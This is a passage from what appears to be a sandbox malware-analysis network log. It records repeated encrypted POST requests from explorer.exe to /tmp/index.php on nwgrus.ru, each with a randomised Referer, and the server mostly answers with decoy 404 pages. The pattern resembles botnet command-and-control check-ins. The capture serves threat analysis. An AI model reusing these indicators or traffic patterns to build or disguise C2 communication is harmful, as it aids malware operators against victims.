Oct 3, 2024 12:28:00.313723087 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:00.346709967 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qkabdlcselvepu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: nwgrus.ru
Oct 3, 2024 12:28:00.346709967 CEST	279	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5e 38 b1 f4 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu^8DJNpT;):jE_]W%L57KL=]-qM3bRsUL>v)Mw?fr],g%
Oct 3, 2024 12:28:02.008135080 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:01 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:02.072351933 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fboiokwqifnpfwwg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: nwgrus.ru
Oct 3, 2024 12:28:02.072388887 CEST	164	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 4b 59 c4 b6 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuKY~O@H]HI*0H(7Zk(/mE
Oct 3, 2024 12:28:04.226339102 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:04.241367102 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cjlnjwyjoxyuf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 174 Host: nwgrus.ru
Oct 3, 2024 12:28:04.241400003 CEST	174	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 78 37 fa f1 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vux7$^RJj9]E7 zS&6G-.EE3U(?kb<D"z
Oct 3, 2024 12:28:05.961652994 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:05.981570959 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jvksadufkdlihaeq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: nwgrus.ru
Oct 3, 2024 12:28:05.981570959 CEST	275	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 50 2a a5 9a Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuPUA_<=P3a=@=jztn5]Zx<O21LCAPuX>2AOKECB#.~J6DinhI6
Oct 3, 2024 12:28:07.987464905 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:07 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:08.048866987 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ricjpvrheenoi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: nwgrus.ru
Oct 3, 2024 12:28:08.048922062 CEST	119	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 3f 27 db 8f Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu?'UO[E0J^F1^\|4t
Oct 3, 2024 12:28:09.875607967 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:09.907893896 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uobogpxbvskdl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 3, 2024 12:28:09.907931089 CEST	261	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 53 1e f3 ea Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuSx+\VISoC[~/UW-BpO,XXi[Oz;!&+wO\|+N2uhWKS}HIfW}q`>0l
Oct 3, 2024 12:28:12.116727114 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:12.127814054 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vwmsjsqvwuhba.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: nwgrus.ru
Oct 3, 2024 12:28:12.127844095 CEST	331	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 72 3b c1 94 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vur;Q<UQ~9hD/:kMc~4s+?Tv w~A=yK2X\|:]b.ZG:j#nL!;ay<"-
Oct 3, 2024 12:28:14.089869976 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:14.097873926 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kskrxgkqoed.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Oct 3, 2024 12:28:14.097873926 CEST	190	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3f 19 de ae Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu?X_yBscl2x&#x&EY**OOO.{~U?G&=HsZ0]
Oct 3, 2024 12:28:15.643258095 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49763	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:16.961728096 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://euceyfvfmeh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: nwgrus.ru
Oct 3, 2024 12:28:16.961728096 CEST	169	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 52 02 cb bb Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA ,[k,vuRm-uoe8lSuXFGj_V6xz#";HaT?5]
Oct 3, 2024 12:28:18.517016888 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49764	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:28:18.525346994 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qptrydkvolka.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: nwgrus.ru
Oct 3, 2024 12:28:18.525366068 CEST	125	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 51 3f c0 9d Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuQ?KGi~wl} u:2KW3
Oct 3, 2024 12:28:20.066890955 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:28:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
